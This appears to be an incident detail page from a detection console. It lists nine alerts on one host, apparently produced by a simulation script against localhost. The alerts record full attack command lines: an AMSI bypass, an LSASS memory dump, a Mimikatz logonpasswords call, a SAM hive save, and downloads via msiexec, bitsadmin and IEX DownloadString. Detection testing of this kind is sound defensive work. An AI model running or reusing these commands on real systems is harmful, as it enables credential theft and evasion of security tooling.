Back to list
Critical CINC-20251220-06654C0C new
Aggregate ID: aggind:47186ef241ea495885522e5d4930eda3:8682360018
Incident Overview
Incident ID
CINC-20251220-06654C0C
Severity
Critical (90)
Status
new
Alert Count
9
Host Count
1
Timeline
First Seen
2025-12-18 11:36:30
Last Seen
2025-12-18 11:41:53
Duration
0d 0h 5m
Created
2025-12-20 13:23
Updated
2026-01-13 15:14
Kill Chain Analysis
Rec...
Ini...
Exe...
Per...
Pri...
Def...
Cre...
Dis...
Lat...
Col...
Com...
Exf...
Imp...
Observed Tactics:
Techniques:
Affected Hosts (1)
Related Alerts (9)
| Severity | Status | Hostname | Description | Tactic | Command Line | Time |
|---|---|---|---|---|---|---|
| High | new | TEAHEE | Execution | powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" | 12-18 11:41 | |
| High | new | TEAHEE | Credential Access | C:\WINDOWS\system32\cmd.exe /c "procdump -ma lsass.exe C:\Users\dokji\AppData\Local\Temp\lsass.dmp" | 12-18 11:41 | |
| High | new | TEAHEE | Credential Access | C:\WINDOWS\system32\cmd.exe /c "powershell -c "sekurlsa::logonpasswords"" | 12-18 11:41 | |
| High | new | TEAHEE | AI Powered IOA | powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" | 12-18 11:37 | |
| Critical | new | TEAHEE | Credential Access | reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv | 12-18 11:37 | |
| High | new | TEAHEE | Persistence | msiexec /q /i http://127.0.0.1/test.msi | 12-18 11:37 | |
| High | new | TEAHEE | Defense Evasion | bitsadmin /transfer j http://127.0.0.1/test C:\Users\dokji\AppData\Local\Temp\bits.exe | 12-18 11:37 | |
| High | new | TEAHEE | Execution | C:\WINDOWS\system32\cmd.exe /c "powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/ps')"" | 12-18 11:37 | |
| Informational | new | TEAHEE | Execution | "python" mega_incident_generator.py --rounds 2 --interval 30 | 12-18 11:36 |